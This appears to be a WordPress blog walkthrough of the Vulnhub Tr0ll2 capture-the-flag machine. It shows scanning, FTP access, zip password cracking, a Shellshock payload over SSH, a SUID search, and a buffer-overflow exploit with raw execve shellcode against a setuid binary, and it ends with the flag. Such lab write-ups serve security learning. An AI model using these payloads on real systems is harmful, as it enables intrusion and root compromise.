Vulnhub Tr0ll2 Walkthrough

We start scanning the host with nmap –T4 –A –p- 192.168.1.20 –vv

Dirb scan :

Tried every one of these directories but nothing worked and I got trolled by all of them

Lets try the ftp port

So I got in using Tr0ll as username and password and downloaded a zip file using get command, but the file is password protected.

I went back to the directories, I was missing something there, the directory /dont_bother/ got a picture with cats ( same as 3 other directories ) but this one got a directory inside the picture, using strings <file_name> you can see there is a message saying Look Deep within y0ur_self for the answer, the ( Y0ur_self ) is a directory with a text file

The text file is huge inside but it looks like a 64code file , so we need to decode it using:

base64 –decode answer.txt > decode.txt , the new file will use it to brute force the zip file

it gave this password ItCantReallyBeThisEasyRightLOL the file contain a private ssh key

We going to use it to login to the ssh service on the host, BUT I spent hours to how to connect to ssh as every time I try to log in using Tr0ll or noob it kicks me out ,so after searching the internet I came across ssh shellshock , a simple code we use it to force login using the private key and the username and password but stay connected

We use ‘() { :;}; echo MALICIOUS CODE’

ssh -i noob noob@192.168.1.20 ‘() { :;}; /bin/bash’

after that we escape the shell using

python -c ‘import pty; pty.spawn(“/bin/bash”)’

 and try to find Sticky Bits using

find / -perm -u=s -type f 2>/dev/null

we got a 3 directories

/nothing_to_see_here/choose_wisely/door2/r00t

/nothing_to_see_here/choose_wisely/door3/r00t

/nothing_to_see_here/choose_wisely/door1/r00t

When we run r00t in door3 it gave back what we write so we can exploit it by using buffer overflow

./r00t $(python –c ‘print “A” *300’)

We tried 300 and it gave us segmentation fault so lets create the pattern

The host is running gdp

Gdb r00t

./r00t $(python -c ‘print “A”*268 + “\x80\xfb\xff\xbf” + “\x90” *10 +”\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80″‘)

0x6a413969 we going to use in as the memory offset

The offset came with 268, now we need to locate the ESP location , we going to over flow it with A’s and B’s

The last step would look something like this

./r00t $(python -c ‘print “A”*268 + “\x80\xfc\xff\xbf” + “\x90”*10 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80”’)

a70354f0258dcc00292c72aab3c8b1e4

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s